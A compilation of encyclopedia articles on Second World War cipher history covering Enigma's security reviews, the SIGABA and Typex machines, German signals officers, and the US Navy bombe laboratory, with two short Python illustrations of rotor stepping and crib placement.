Maertens stated that "if [the] U-111 message was read, then there would be an attempt to disturb the meeting." However, he again shied away from directly suggesting that the Key M infrastructure had been compromised. He could not believe that the British would have made such a mess of the attack in such favourable conditions if the Naval Enigma cipher had been broken. On 24 October 1941, Maertens's overall conclusion was stated in a letter to Dönitz: The acute disquiet about the compromise of our Secret Operation cannot be justified. Our cipher does not appear to be broken.[9] In fact, the Naval Intelligence Division had solved a message intercepted from U-111, and the Admiralty had dispatched the submarine HMS Clyde to destroy the U-boats in the Bay of Tarrafal on the island of Santo Antão.[10] In February and March 1943, Admiral Dönitz met with Adolf Hitler four times to discuss the Battle of the Atlantic, and in particular the possibility that the Allies knew the locations of the U-boat groups, since they were routing the convoys around the wolfpacks. It was strongly suspected that the Allies had broken the cipher machine, and again Maertens was asked to conduct an enquiry.
He again assured Dönitz and exculpated the security of the Enigma cipher machine.[11] Around the same time, documents were discovered in French Resistance agent stations showing that the Allies were obtaining information from the resistance on departure times for U-boats and on whether they were going north or south, enabling the enemy, Maertens thought, to estimate submarine movements with some accuracy. The discovery of centimetric radar, operating on a wavelength of 9.7 cm, aboard a downed British bomber in Rotterdam supported his assumptions. The radar meant that British aeroplanes could detect a surfaced U-boat without alerting it and could attack by surprise. Indeed, the Royal Air Force had begun to do exactly that in the Bay of Biscay, though not anywhere else. Dönitz accepted Maertens's view that the Enigma Key M infrastructure was secure. Dönitz wrote in his war diary: With the exception of two or three doubtful cases, enemy information about the position of our U-boats appears to have been obtained mainly from extensive use of airborne radar, and the resultant plotting of these positions has enabled him [the enemy] to organize effective diversion of convoy traffic.[12][13] In early May 1943, Dönitz removed Maertens from his post, for reasons that went beyond his fears about crypto-security, and sent him to run the Kriegsmarine shipyard in Kiel.[12] One reason for Maertens's and the Kriegsmarine's very high confidence in the Enigma cipher machine was the incorporation of a secret procedure that they believed would thwart any possibility of cracking the code. This was the keyword procedure (German: Stichwort), which the Kriegsmarine had introduced and which completely altered the Naval Enigma cipher machine's inner and outer key settings as given on the printed settings list.[11][14]
https://en.wikipedia.org/wiki/Erhard_Maertens
Fritz Erich Fellgiebel (4 October 1886 – 4 September 1944) was a German Army general of signals and a resistance fighter, participating both in the 1938 September Conspiracy to topple dictator Adolf Hitler and the Nazi Party, and in the 1944 20 July plot to assassinate the Führer. In 1929, Fellgiebel became head of the cipher bureau (German: Chiffrierstelle) of the Ministry of the Reichswehr, which would later become the OKW/Chi. He was a signals specialist and was instrumental in introducing a common enciphering machine, the Enigma machine. However, he was unsuccessful in promoting a single cipher agency to coordinate all operations, as was demanded by OKW/Chi; the proposal was blocked by Joachim von Ribbentrop, Heinrich Himmler and Hermann Göring until autumn 1943. It was not achieved until General Albert Praun took over the post[1] following Fellgiebel's arrest and execution for his role in the 20 July attempted coup. Fellgiebel was born in Pöpelwitz[2] (present-day Popowice in Wrocław, Poland) in the Prussian Province of Silesia. At the age of 18, he joined a signals battalion of the Prussian Army as an officer cadet. During the First World War, he served as a captain on the General Staff. After the war, he was assigned to Berlin as a General Staff officer of the Reichswehr. His service had been exemplary, and in 1928 he was promoted to the rank of major. Fellgiebel was promoted to lieutenant colonel in 1933 and became a full colonel (Oberst) the following year. By 1938, he was a major general. That year, he was appointed Chief of the Army's Signal Establishment and Chief of the Wehrmacht's communications liaison to the Supreme Command (OKW). Fellgiebel became General der Nachrichtentruppe (General of the Communications Troops) on 1 August 1940. In 1942, Fellgiebel was promoted to Chief Signal Officer of the Army High Command and of the Supreme Command of the Armed Forces (German: Chef des Heeresnachrichtenwesens), a position he held until 1944, when he was arrested and executed for his key role in the 20 July plot to assassinate Hitler.[3] Adolf Hitler did not fully trust Fellgiebel, considering him too independent-minded, but Hitler needed Fellgiebel's expertise. Fellgiebel was one of the first to understand that the German military should adopt and use the Enigma encryption machine. As head of Hitler's signal services, Fellgiebel knew every military secret, including Wernher von Braun's rocketry work at the Peenemünde Army Research Center. Through his acquaintance with Colonel General Ludwig Beck, his superior, and then Beck's successor, Colonel General Franz Halder, Fellgiebel contacted the anti-Nazi resistance group in the Wehrmacht armed forces. In the 1938 September Conspiracy to topple Hitler and the Nazi Party on the eve of the Munich Agreement, he was supposed to cut communications throughout Germany while Field Marshal Erwin von Witzleben would occupy Berlin. He was a key source for the Red Orchestra. Fellgiebel released classified German military information to Rudolf Roessler (codename "Lucy" of the Lucy spy ring) about Operation Citadel, which allowed Soviet forces to deploy effectively.[4] Fellgiebel was involved in the preparations for Operation Valkyrie and, during the attempt on the Führer's life on 20 July 1944,[5] tried to cut off Hitler's headquarters at the Wolf's Lair in East Prussia from all telecommunication connections. He only partly succeeded, as he could not prevent Joseph Goebbels in Berlin from being informed via separate SS links. When it became clear that the attempt had failed, Fellgiebel had to override the communications blackout he had set up.
Fellgiebel's most famous act that day was his telephone report to his co-conspirator GeneralFritz Thieleat theBendlerblock, after he was informed that Hitler was still alive:"Etwas Furchtbares ist passiert! Der Führer lebt!"("Something awful has happened! TheFührerlives!"). Fellgiebel was arrested immediately at the Wolf's Lair and tortured for three weeks but did not reveal any names of his co-conspirators.[6]He was charged before theVolksgerichtshof("People's Court"). On 10 August 1944, he was found guilty byRoland Freislerand sentenced to death. He was executed on 4 September 1944 atPlötzensee Prisonin Berlin. TheBundeswehr's barracks, Information Technology School of the Bundeswehr ("Schule Informationstechnik der Bundeswehr") inPöcking, is named theGeneral-Fellgiebel-Kasernein his honour.
https://en.wikipedia.org/wiki/Erich_Fellgiebel
In thehistory of cryptography, theECM Mark IIwas acipher machineused by the United States for messageencryptionfromWorld War IIuntil the 1950s. The machine was also known as theSIGABAorConverter M-134by the Army, orCSP-888/889by the Navy, and a modified Navy version was termed theCSP-2900. Like many machines of the era it used an electromechanical system ofrotorsto encipher messages, but with a number of security improvements over previous designs. No successfulcryptanalysisof the machine during its service lifetime is publicly known. It was clear to US cryptographers well before World War II that the single-stepping mechanical motion of rotor machines (e.g. theHebern machine) could be exploited by attackers. In the case of the famousEnigma machine, these attacks were supposed to be upset by moving the rotors to random locations at the start of each new message. This, however, proved not to be secure enough, and German Enigma messages were frequently broken bycryptanalysisduring World War II. William Friedman, director of theUS Army'sSignals Intelligence Service, devised a system to correct for this attack by truly randomizing the motion of the rotors. His modification consisted of apaper tapereader from ateletypemachine attached to a small device with metal "feelers" positioned to pass electricity through the holes. When a letter was pressed on the keyboard the signal would be sent through the rotors as it was in the Enigma, producing an encrypted version. In addition, the current would also flow through the paper tape attachment, and any holes in the tape at its current location would cause the corresponding rotor to turn, and then advance the paper tape one position. In comparison, the Enigma rotated its rotors one position with each key press, a much less random movement. The resulting design went into limited production as theM-134 Converter, and its message settings included the position of the tape and the settings of a plugboard that indicated which line of holes on the tape controlled which rotors. However, there were problems using fragile paper tapes under field conditions. Friedman's associate,Frank Rowlett, then came up with a different way to advance the rotors, using another set of rotors. In Rowlett's design, each rotor must be constructed such that between one and four output signals were generated, advancing one or more of the rotors (rotors normally have one output for every input). There was little money for encryption development in the US before the war, so Friedman and Rowlett built a series of "add on" devices called theSIGGOO(or M-229) that were used with the existing M-134s in place of the paper tape reader. These were external boxes containing a three rotor setup in which five of the inputs were live, as if someone had pressed five keys at the same time on an Enigma, and the outputs were "gathered up" into five groups as well — that is all the letters from A to E would be wired together for instance. That way the five signals on the input side would be randomized through the rotors, and come out the far side with power in one of five lines. Now the movement of the rotors could be controlled with a day code, and the paper tape was eliminated. They referred to the combination of machines as the M-134-C. In 1935 they showed their work toJoseph Wenger, a cryptographer in theOP-20-Gsection of theU.S. Navy. 
He found little interest for it in the Navy until early 1937, when he showed it to CommanderLaurance Safford, Friedman's counterpart in theOffice of Naval Intelligence. He immediately saw the potential of the machine, and he and Commander Seiler then added a number of features to make the machine easier to build, resulting in theElectric Code Machine Mark II(orECM Mark II), which the navy then produced as the CSP-889 (or 888). Oddly, the Army was unaware of either the changes or the mass production of the system, but were "let in" on the secret in early 1940. In 1941 the Army and Navy joined in a joint cryptographic system, based on the machine. The Army then started using it as theSIGABA. Just over 10,000 machines were built.[1]: p. 152 On 26 June 1942, the Army and Navy agreed not to allow SIGABA machines to be placed in foreign territory except where armed American personnel were able to protect the machine.[2]The SIGABA would be made available to another Allied country only if personnel of that country were denied direct access to the machine or its operation by an American liaison officer who would operate it.[2] SIGABA was similar to the Enigma in basic theory, in that it used a series of rotors to encipher every character of the plaintext into a different character of ciphertext. Unlike Enigma's three rotors however, the SIGABA included fifteen, and did not use a reflecting rotor. The SIGABA had three banks of five rotors each; the action of two of the banks controlled the stepping of the third. The SIGABA advanced one or more of its main rotors in a complex, pseudorandom fashion. This meant that attacks which could break other rotor machines with simpler stepping (for example, Enigma) were made much more complex. Even with the plaintext in hand, there were so many potential inputs to the encryption that it was difficult to work out the settings. On the downside, the SIGABA was also large, heavy, expensive, difficult to operate, mechanically complex, and fragile. It was nowhere near as practical a device as the Enigma, which was smaller and lighter than the radios with which it was used. It found widespread use in the radio rooms of US Navy ships, but as a result of these practical problems the SIGABA simply couldn't be used in the field. In most theatres other systems were used instead, especially for tactical communications. One of the most famous was the use ofNavajo code talkersfor tactical field communications in the Pacific Theater. In other theatres, less secure, but smaller, lighter, and sturdier machines were used, such as theM-209. SIGABA, impressive as it was, was overkill for tactical communications. This said, new speculative evidence emerged more recently that the M-209 code was broken by German cryptanalysts during World War II.[3] Because SIGABA did not have a reflector, a 26+ pole switch was needed to change the signal paths through the alphabet maze between the encryption and decryption modes. The long “controller” switch was mounted vertically, with its knob on the top of the housing. See image. It had five positions, O, P, R, E and D. Besides encrypt (E) and decrypt (D), it had a plain text position (P) that printed whatever was typed on the output tape, and a reset position (R) that was used to set the rotors and to zeroize the machine. The O position turned the machine off. The P setting was used to print the indicators and date/time groups on the output tape. It was the only mode that printed numbers. 
No printing took place in the R setting, but the digit keys were active to increment the rotors. During encryption, the Z key was connected to the X key, and the space bar produced a Z input to the alphabet maze. A Z was printed as a space on decryption. The reader was expected to understand that a word like "xebra" in a decrypted message was actually "zebra." The printer automatically added a space between each group of five characters during encryption. The SIGABA was zeroized when all the index rotors read zero in their low-order digit and all the alphabet and code rotors were set to the letter O. Each rotor had a cam that caused the rotor to stop in the proper position during the zeroize process. SIGABA's rotors were all housed in a removable frame held in place by four thumb screws. This allowed the most sensitive elements of the machine to be stored in more secure safes and to be quickly thrown overboard or otherwise destroyed if capture was threatened. It also allowed a machine to quickly switch between networks that used different rotor orders. Messages had two 5-character indicators: an exterior indicator that specified the system being used and the security classification, and an interior indicator that determined the initial settings of the code and alphabet rotors. The key list included separate index rotor settings for each security classification. This prevented lower-classification messages from being used as cribs to attack higher-classification messages. The Navy and Army had different procedures for the interior indicator. Both started by zeroizing the machine and having the operator select a random 5-character string for each new message. This was then encrypted to produce the interior indicator. Army key lists included an initial setting for the rotors that was used to encrypt the random string. Navy operators used the keyboard to increment the code rotors until they matched the random character string. The alphabet rotors would move during this process, and their final position was the internal indicator. In the case of joint operations, the Army procedures were followed. The key lists included a "26-30" check string. After the rotors were reordered according to the current key, the operator would zeroize the machine, encrypt 25 characters and then encrypt "AAAAA". The ciphertext resulting from the five A's had to match the check string. The manual warned that typographical errors were possible in key lists and that a four-character match should be accepted. The manual also gave suggestions on how to generate random strings for creating indicators. These ranged from using playing cards and poker chips to selecting characters from cipher texts, or using the SIGABA itself as a random character generator.[4] Although the SIGABA was extremely secure, the US continued to upgrade its capability throughout the war, for fear of Axis cryptanalytic ability to break SIGABA's code. When Germany's Enigma messages and Japan's Type B Cipher Machine were broken, the decrypted messages were closely scrutinized for signs that Axis forces were able to read US cryptographic systems. Axis prisoners of war (POWs) were also interrogated with the goal of finding evidence that US cryptography had been broken. However, neither the Germans nor the Japanese were making any progress in breaking the SIGABA code.
A decrypted JN-A-20 message, dated 24 January 1942, sent from the naval attaché in Berlin to the vice chief of the Japanese Naval General Staff in Tokyo, reported the "joint Jap[anese]-German cryptanalytical efforts" to be "highly satisfactory", since the "German[s] have exhibited commendable ingenuity and recently experienced some success on English Navy systems", but were "encountering difficulty in establishing successful techniques of attack on 'enemy' code setup". In another decrypted JN-A-20 message, the Germans admitted that their progress in breaking US communications was unsatisfactory. The Japanese also admitted in their own communications that they had made no real progress against the American cipher system. In September 1944, when the Allies were advancing steadily on the Western front, the war diary of the German Signal Intelligence Group recorded: "U.S. 5-letter traffic: Work discontinued as unprofitable at this time".[5] SIGABA systems were closely guarded at all times, with separate safes for the system base and the code-wheel assembly, but there was one incident where a unit was lost for a time. On February 3, 1945, a truck carrying a SIGABA system in three safes was stolen while its guards were visiting a brothel in recently liberated Colmar, France. General Eisenhower ordered an extensive search, which finally discovered the safes six weeks later in a nearby river.[6]: pp.510–512 The need for cooperation among US, British, and Canadian forces in carrying out joint military operations against Axis forces gave rise to the need for a cipher system that could be used by all Allied forces. This functionality was achieved in three different ways. Firstly, the ECM Adapter (CSP 1000), which could be retrofitted on Allied cipher machines, was produced at the Washington Naval Yard ECM Repair Shop. A total of 3,500 adapters were produced.[5] The second method was to adapt the SIGABA for interoperation with a modified British machine, the Typex. The common machine was known as the Combined Cipher Machine (CCM), and was used from November 1943.[2] Because of the high cost of production, only 631 CCMs were made. The third way was the most common and most cost-effective: the "X" Adapter, manufactured by the Teletype Corporation in Chicago. A total of 4,500 of these adapters were installed at depot-level maintenance facilities.[5]
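The cascade-controlled stepping described earlier in this article is the heart of SIGABA's strength, and the general idea is easy to simulate. The following Python sketch is a toy model only: the rotor permutations are randomly generated stand-ins and the signal routing is invented, not the real SIGABA wiring. It shows how a control-rotor maze with four energized inputs selects between one and four of the five cipher rotors to step, in contrast to Enigma's predictable odometer motion.

```python
import random

def make_rotor(rng):
    """A random 26-contact rotor permutation (an invented stand-in)."""
    perm = list(range(26))
    rng.shuffle(perm)
    return perm

def odometer_step(positions):
    """Enigma-like motion for comparison: an odometer-style carry chain."""
    for i in range(len(positions)):
        positions[i] = (positions[i] + 1) % 26
        if positions[i] != 0:        # stop unless this rotor wrapped around
            break

def cascade_step(cipher_pos, control_rotors, control_pos):
    """Route four live inputs through the control-rotor maze; the surviving
    signals (between one and four of them) pick which cipher rotors step."""
    signals = set()
    for inp in (5, 6, 7, 8):                        # four energized inputs
        x = inp
        for rotor, pos in zip(control_rotors, control_pos):
            x = (rotor[(x + pos) % 26] - pos) % 26
        signals.add(x % len(cipher_pos))            # "gather" lines per rotor
    for i in signals:
        cipher_pos[i] = (cipher_pos[i] + 1) % 26    # irregular stepping
    odometer_step(control_pos)                      # control bank steps regularly

rng = random.Random(1943)
control_rotors = [make_rotor(rng) for _ in range(3)]
cipher_pos, control_pos = [0] * 5, [0, 0, 0]
for _ in range(6):
    cascade_step(cipher_pos, control_rotors, control_pos)
    print(cipher_pos)   # compare with the regular 1, 2, 3... of an odometer
```

Running the sketch shows the cipher bank advancing in a hard-to-predict pattern, which is exactly the property that frustrated the simple stepping attacks mentioned above.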
https://en.wikipedia.org/wiki/SIGABA
Fritz Thiele (14 April 1894 – 4 September 1944) was a member of the German resistance who also served as the communications chief of the German Army during World War II.[1] Thiele was born in Berlin and joined the Imperial Army in 1914. Working closely with Chief of Army Communications General der Nachrichtentruppe Erich Fellgiebel, he was part of the assassination attempt against Adolf Hitler on 20 July 1944. As part of the coup attempt, he was responsible for severing communications between officers loyal to Hitler and armed forces units in the field, working from the communications centre at the Bendlerstrasse in Berlin; he relayed a crucial message from Fellgiebel to General Friedrich Olbricht and the other conspirators that the assassination attempt had failed but that the coup attempt should still proceed. There are differing accounts of the time at which he provided this report. Thiele himself did not want to proceed with the coup attempt once he knew that the assassination attempt had failed, and he left the Bendlerstrasse and visited Walter Schellenberg at the Reich Central Security Office in an attempt to extricate himself.[2] Following Fellgiebel's arrest, Thiele was directed to assume his duties before he was himself arrested by the Gestapo on 11 August 1944. He was condemned to death on 21 August 1944 by the Volksgerichtshof and hanged on 4 September 1944 at Plötzensee prison in Berlin.
https://en.wikipedia.org/wiki/Fritz_Thiele
Gisbert F. R. Hasenjaeger (1 June 1919 – 2 September 2006) was a German mathematical logician. Independently of and simultaneously with Leon Henkin in 1949, he developed a new proof of the completeness theorem of Kurt Gödel for predicate logic.[2][3] He worked as an assistant to Heinrich Scholz at Section IVa of the Oberkommando der Wehrmacht Chiffrierabteilung, and was responsible for the security of the Enigma machine.[4] Gisbert Hasenjaeger went to high school in Mülheim, where his father Edwin Renatus Hasenjaeger was a lawyer and local politician. After completing school in 1936, Gisbert volunteered for labour service. He was drafted for military service in World War II, and fought as an artillerist in the Russian campaign, where he was badly wounded in January 1942. After his recovery, in October 1942, Heinrich Scholz[5] got him employment in the Cipher Department of the High Command of the Wehrmacht (OKW/Chi), where, at 24, he was the youngest member. He attended a cryptography training course given by Erich Hüttenhain, and was put into the recently founded Section IVa, "Security check of own Encoding Procedures", under Karl Stein, who assigned him the security check of the Enigma machine.[6][7] At the end of the war, as OKW/Chi disintegrated, Hasenjaeger managed to escape TICOM, the United States effort to round up and seize captured German intelligence people and material.[6] From the end of 1945, he studied mathematics and especially mathematical logic with Heinrich Scholz at the Westfälische Wilhelms-Universität in Münster. In 1950 he received his doctorate with the thesis Topological studies on the semantics and syntax of an extended predicate calculus, and he completed his habilitation in 1953.[3] In Münster, Hasenjaeger worked as an assistant to Scholz, and later as co-author, on the textbook Fundamentals of Mathematical Logic in Springer's Grundlehren series (the Yellow series of Springer-Verlag), which he published in 1961, fully six years after Scholz's death. In 1962, Hasenjaeger left Münster to take a full professorship at the University of Bonn, where he became Director of the newly established Department of Logic and Basic Research. In 1964/65, he spent a year at Princeton University at the Institute for Advanced Study.[8] His doctoral students at Bonn included Ronald B. Jensen, his most famous pupil.[3] Hasenjaeger became professor emeritus in 1984.[9] In October 1942, after starting work at OKW/Chi, Hasenjaeger was trained in cryptology by the mathematician Erich Hüttenhain, widely considered the most important German cryptologist of his time. Hasenjaeger was put into a newly formed department, whose principal responsibility was the defensive testing and security control of their own methods and devices.[6][10] Hasenjaeger was ordered by the mathematician Karl Stein, who was also conscripted at OKW/Chi, to examine the Enigma machine for cryptologic weaknesses, while Stein was to examine the Siemens and Halske T52 and the Lorenz SZ-42.[10] The Enigma machine that Hasenjaeger examined was a variation that worked with three rotors and had no plugboard. Germany sold this version to neutral countries to accrue foreign exchange. Hasenjaeger was presented with a 100-character encrypted message for analysis and found a weakness which enabled the identification of the correct wiring rotors and also the appropriate rotor positions, allowing the messages to be decrypted. Further success eluded him, however.
He crucially failed to identify the most important weakness of the Enigma machine: the lack of fixed points (letters encrypting to themselves), a consequence of the reflector. Hasenjaeger could take some comfort from the fact that even Alan Turing missed this weakness. Instead, the honour was attributed to Gordon Welchman, who used the knowledge to help decrypt several hundred thousand Enigma messages during the war.[6][10] In fact, fixed points had earlier been used by the Polish codebreaker Henryk Zygalski as the basis for his method of attack on the Enigma cipher, referred to by the Poles as "Zygalski sheets" (płachty Zygalskiego) and by the British as the "Netz method". It was while Hasenjaeger was working at the Westfälische Wilhelms-Universität in Münster, in the period between 1946 and 1953, that he made a remarkable discovery: a proof of Kurt Gödel's completeness theorem for full predicate logic with identity and function symbols.[3] Gödel's proof of 1930 for predicate logic did not automatically establish a procedure for the general case. When Hasenjaeger solved the problem in late 1949, he was frustrated to find that a young American mathematician, Leon Henkin, had also created a proof.[3] Both proofs construct, from an extension of the theory, a term model which is then a model of the initial theory. Although the Henkin proof was considered by Hasenjaeger and his peers to be more flexible, Hasenjaeger's is considered simpler and more transparent.[3] Hasenjaeger continued to refine his proof through to 1953, when he made a breakthrough. By the results of Alfred Tarski, Stephen Cole Kleene and Andrzej Mostowski on the arithmetical hierarchy of formulas, the set of arithmetical propositions that are true in the standard model is not arithmetically definable. This raises the question of how complex the notion of truth is for the term model that the Hasenjaeger method produces for recursively axiomatized Peano arithmetic. The answer: the truth predicate of this term model is arithmetically definable, in fact it is $\Delta_2^0$.[3] That is remarkably far down in the arithmetical hierarchy, and it holds for any recursively axiomatized (countable, consistent) theory, even if all the $\Pi_1^0$ formulas true in the natural numbers are added to the axioms. This classic proof is a very early, original application of the arithmetical hierarchy theory to a general logical problem. It appeared in 1953 in the Journal of Symbolic Logic.[11] In 1963, Hasenjaeger built a universal Turing machine out of old telephone relays. Although Hasenjaeger's work on UTMs was largely unknown, and he never published any details of the machinery during his lifetime, his family decided to donate the machine to the Heinz Nixdorf Museum in Paderborn, Germany, after his death.[12][13] In an academic paper presented at the International Conference on the History and Philosophy of Computing in 2012,[12] Rainer Glaschick, Turlough Neary, Damien Woods and Niall Murphy examined Hasenjaeger's UTM at the request of the Hasenjaeger family and found that it was remarkably small and efficiently universal. Hasenjaeger's UTM had 3 tapes, 4 states and 2 symbols, and was an evolution of ideas from Edward F. Moore's first universal machine and Hao Wang's B-machine. Hasenjaeger went on to build a small, efficient Wang B-machine simulator. This was again proven, by the team assembled by Rainer Glaschick, to be efficiently universal.
It was only in the 1970s that Hasenjaeger learned that the Enigma machine had been so comprehensively broken.[6] It impressed him that Alan Turing himself, considered one of the greatest mathematicians of the 20th century, had worked on breaking the device. That the Germans had so comprehensively underestimated the weaknesses of the device, in contrast to Turing's and Welchman's work, was something Hasenjaeger later came to see as entirely positive. Hasenjaeger stated: Had it not been so, the war would probably have lasted longer, and the first atomic bomb would not have fallen on Japan, but on Germany.[6]
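The reflector weakness discussed above lends itself to a short illustration. Because no letter could ever encrypt to itself, Allied cryptanalysts could slide a suspected plaintext (a "crib") along a ciphertext and discard any alignment where crib and ciphertext agreed in some position. A minimal Python sketch of that test follows; the ciphertext and crib here are invented for illustration:

```python
def possible_positions(ciphertext: str, crib: str):
    """Return the crib alignments not ruled out by Enigma's no-fixed-point
    property: a letter never encrypts to itself, so any offset where the
    crib letter equals the ciphertext letter above it is impossible."""
    positions = []
    for offset in range(len(ciphertext) - len(crib) + 1):
        window = ciphertext[offset:offset + len(crib)]
        if all(c != p for c, p in zip(window, crib)):
            positions.append(offset)
    return positions

# Invented example: sliding a likely word such as "WETTER" (weather)
# along an intercepted ciphertext.
ct = "QFZWRWIVTYRESXBFOGKUHQBAISEZ"
print(possible_positions(ct, "WETTER"))
```

Each surviving offset is a candidate placement worth testing further; in practice this simple filter drastically reduced the search space before machine methods such as the bombe were applied.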
https://en.wikipedia.org/wiki/Gisbert_Hasenjaeger
The United States Naval Computing Machine Laboratory (NCML) was a highly secret design and manufacturing site for code-breaking machinery located in Building 26 of the National Cash Register (NCR) company in Dayton, Ohio, and operated by the United States Navy during World War II. It is now on the List of IEEE Milestones,[1] and one of its machines is on display at the National Cryptologic Museum. The laboratory was established in 1942 by the Navy and the National Cash Register Company to design and manufacture a series of code-breaking machines ("bombes") targeting German Enigma machines, based on earlier work by the British at Bletchley Park (which in turn owed something to pre-war Polish cryptanalytical work). Joseph Desch led the effort.[2] Preliminary designs, approved in September 1942, called for a fully electronic machine to be delivered by year's end. However, these plans were soon judged infeasible, and revised plans were approved in January 1943 for an electromechanical machine, which became the US Navy bombe. These designs were proceeding in parallel with, and were influenced by, British attempts to build a high-speed bombe for the German 4-rotor Enigma. Indeed, Alan Turing visited Dayton in December 1942. His reaction was far from enthusiastic. The American approach was, however, successful. The first two experimental bombes went into operation in May 1943, running in Dayton so they could be observed by their engineers. Designs for production models were completed in April 1943, with initial operation starting in early June. All told, the laboratory constructed 121 bombes, which were then employed for code-breaking by the US Navy's signals intelligence and cryptanalysis group OP-20-G in Washington, D.C.[4] Construction was accomplished in three shifts per day by some 600 WAVES (Women Accepted for Volunteer Emergency Service), 100 Navy officers and enlisted men, and a large civilian workforce. Approximately 3,000 workers operated the bombes to produce "Ultra" decryptions of German Enigma traffic. According to a contemporary US Navy report (dated April 1944), the bombes were used on naval jobs until all daily keys had been run; then the machines were used for non-naval tasks. During the previous six months, about 45% of the bombe time had been devoted to non-naval problems carried out at the request of the British. British production and reliability problems with their own high-speed bombes had then recently led to the construction of 50 additional Navy units for Army and Air Force keys. The documentary "Dayton Codebreakers", produced by Aileen LeBlanc, was released in 2006 on American Public Television.[5] The laboratory's location in Dayton, Building 26,[6] on the former National Cash Register Company site, was an Art Deco design by the Dayton firm Schenck & Williams and was located at Patterson Blvd and Stewart Street. The building was demolished by the University of Dayton in January 2008.[7]
https://en.wikipedia.org/wiki/United_States_Naval_Computing_Machine_Laboratory
In the history of cryptography, Typex (alternatively, Type X or TypeX) machines were British cipher machines used from 1937. It was an adaptation of the commercial German Enigma with a number of enhancements that greatly increased its security. The cipher machine (and its many revisions) was used until the mid-1950s, when other, more modern military encryption systems came into use. Like Enigma, Typex was a rotor machine. Typex came in a number of variations, but all contained five rotors, as opposed to three or four in the Enigma. Like the Enigma, the signal was sent through the rotors twice, using a "reflector" at the end of the rotor stack. On a Typex rotor, each electrical contact was doubled to improve reliability. Of the five rotors, typically the first two were stationary. These provided additional enciphering without adding complexity to the rotor-turning mechanisms. Their purpose was similar to the plugboard in the Enigmas, offering additional randomization that could be easily changed. Unlike Enigma's plugboard, however, the wiring of those two rotors could not be easily changed day to day. Plugboards were added to later versions of Typex. The major improvement the Typex had over the standard Enigma was that its rotors contained multiple notches that would turn the neighbouring rotor. This eliminated an entire class of attacks on the system, whereas Enigma's single fixed notches resulted in certain patterns appearing in the cyphertext that could be seen under certain circumstances. Some Typex rotors came in two parts, where a slug containing the wiring was inserted into a metal casing. Different casings contained different numbers of notches around the rim, such as 5, 7 or 9 notches. Each slug could be inserted into a casing in two different ways by turning it over. In use, all the rotors of the machine would use casings with the same number of notches. Normally five slugs were chosen from a set of ten. On some models, operators could achieve a speed of 20 words a minute, and the output ciphertext or plaintext was printed on paper tape. For some portable versions, such as the Mark III, a message was typed with the left hand while the right hand turned a handle.[1] Several Internet Typex articles say that only Vaseline was used to lubricate Typex machines and that no other lubricant was used. Vaseline was in fact used to lubricate the rotor disc contacts; without it there was a risk of arcing, which would burn the insulation between the contacts. For the rest of the machine, two grades of oil (Spindle Oils 1 and 2) were used. Regular cleaning and maintenance were essential. In particular, the letters/figures cam-cluster balata discs had to be kept lubricated. By the 1920s, the British Government was seeking a replacement for its book cipher systems, which had been shown to be insecure and which proved to be slow and awkward to use. In 1926, an inter-departmental committee was formed to consider whether they could be replaced with cipher machines. Over a period of several years and at large expense, the committee investigated a number of options, but no proposal was decided upon. One suggestion was put forward by Wing Commander Oswyn G. W. G. Lywood to adapt the commercial Enigma by adding a printing unit, but the committee decided against pursuing Lywood's proposal. In August 1934, Lywood began work on a machine authorised by the RAF. Lywood worked with J. C. Coulson, Albert P. Lemmon, and Ernest W. Smith at Kidbrooke in Greenwich, with the printing unit provided by Creed & Company.
The first prototype was delivered to the Air Ministry on 30 April 1935. In early 1937, around 30 Typex Mark I machines were supplied to the RAF. The machine was initially termed the "RAF Enigma with Type X attachments". The design of its successor had begun by February 1937. In June 1938, Typex Mark II was demonstrated to the cipher-machine committee, who approved an order of 350 machines. The Mark II model was bulky, incorporating two printers: one for plaintext and one for ciphertext. As a result, it was significantly larger than the Enigma, weighing around 120 lb (54 kg) and measuring 30 in (760 mm) × 22 in (560 mm) × 14 in (360 mm). After trials, the machine was adopted by the RAF, Army and other government departments. During World War II, a large number of Typex machines were manufactured by the tabulating machine manufacturer Powers-Samas.[2] Typex Mark III was a more portable variant, using the same drums as the Mark II machines, powered by turning a handle (it was also possible to attach a motor drive). The maximum operating speed was around 60 letters a minute, significantly slower than the 300 achievable with the Mark II. Typex Mark VI was another handle-operated variant, measuring 20 in (510 mm) × 12 in (300 mm) × 9 in (230 mm), weighing 30 lb (14 kg) and consisting of over 700 components. Plugboards for the reflector were added to the machine from November 1941. For inter-Allied communications during World War II, the Combined Cipher Machine (CCM) was developed, used in the Royal Navy from November 1943. The CCM was implemented by making modifications to Typex and the United States ECM Mark II machine so that they would be compatible. Typex Mark VIII was a Mark II fitted with a morse perforator. Typex 22 (BID/08/2) and Typex 23 (BID/08/3) were late models that incorporated plugboards for improved security. The Mark 23 was a Mark 22 modified for use with the CCM. In New Zealand, Typex Mark II and Mark III were superseded by Mark 22 and Mark 23 on 1 January 1950. The Royal Air Force used a combination of the Creed Teleprinter and Typex until 1960. This amalgamation allowed a single operator to use punch tape and printouts for both sending and receiving encrypted material. Erskine (2002) estimates that around 12,000 Typex machines were built by the end of World War II. Less than a year into the war, the Germans could read all British military encryption other than Typex,[3] which was used by the British armed forces and by Commonwealth countries including Australia, Canada and New Zealand. The Royal Navy decided to adopt the RAF Type X Mark II in 1940 after trials; eight stations already had Type X machines. Eventually over 600 machines would be required. New Zealand initially got two machines, at a cost of £115 each, for Auckland and Wellington.[4] From 1943 the Americans and the British agreed upon a Combined Cipher Machine (CCM). The British Typex and American ECM Mark II could be adapted to become interoperable. While the British showed Typex to the Americans, the Americans never permitted the British to see the ECM, which was a more complex design. Instead, attachments were built for both that allowed them to read messages created on the other.
In 1944 the Admiralty decided to supply two CCM Mark III machines (the Typex Mark II with adaptors for the American CCM) for each "major" war vessel down to and including corvettes, but not submarines; the RNZN vessels were the Achilles, Arabis (then out of action), Arbutus, Gambia and Matua.[5] Although a British test cryptanalytic attack made considerable progress, the results were not as significant as against the Enigma, due to the increased complexity of the system and the low levels of traffic. A Typex machine without rotors was captured by German forces at Dunkirk during the Battle of France, and more than one German cryptanalytic section proposed attempting to crack Typex; however, the B-Dienst codebreaking organisation gave up on it after six weeks, when further time and personnel for such attempts were refused.[6] One German cryptanalyst stated that the Typex was more secure than the Enigma, since it had seven rotors; therefore no major effort was made to crack Typex messages, as the Germans believed that even the Enigma's messages were unbreakable.[7] Although the Typex has been credited with good security, the historic record is much less clear. There was an ongoing investigation into Typex security that arose out of German POWs in North Africa claiming that Typex traffic was decipherable. A brief excerpt from the report:

TOP SECRET U [ZIP/SAC/G.34]
THE POSSIBLE EXPLOITATION OF TYPEX BY THE GERMAN SIGINT SERVICES
